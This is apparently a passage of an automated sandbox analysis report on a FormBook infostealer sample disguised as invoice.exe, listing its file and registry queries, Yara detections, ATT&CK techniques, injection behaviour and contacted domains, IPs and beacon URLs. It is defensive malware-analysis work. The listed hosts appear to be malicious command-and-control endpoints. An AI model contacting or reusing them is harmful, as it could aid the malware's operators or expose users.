          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383898 Sample: invoice.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.harshdeepfashion.com 2->31 33 www.arizonagridiron.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 11 invoice.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\invoice.exe.log, ASCII 11->29 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Injects a PE file into a foreign processes 11->61 15 invoice.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 hotelmaktub.com 177.55.108.130, 49732, 80 RedeHostInternetLtdaBR Brazil 18->35 37 www.highdeserthealthinsurance.com 74.208.236.64, 49731, 80 ONEANDONE-ASBrauerstrasse48DE United States 18->37 39 15 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Performs DNS queries to domains with low reputation 18->51 22 wscript.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          invoice.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.invoice.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          legacyadmin.support0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8g0%Avira URL Cloudsafe
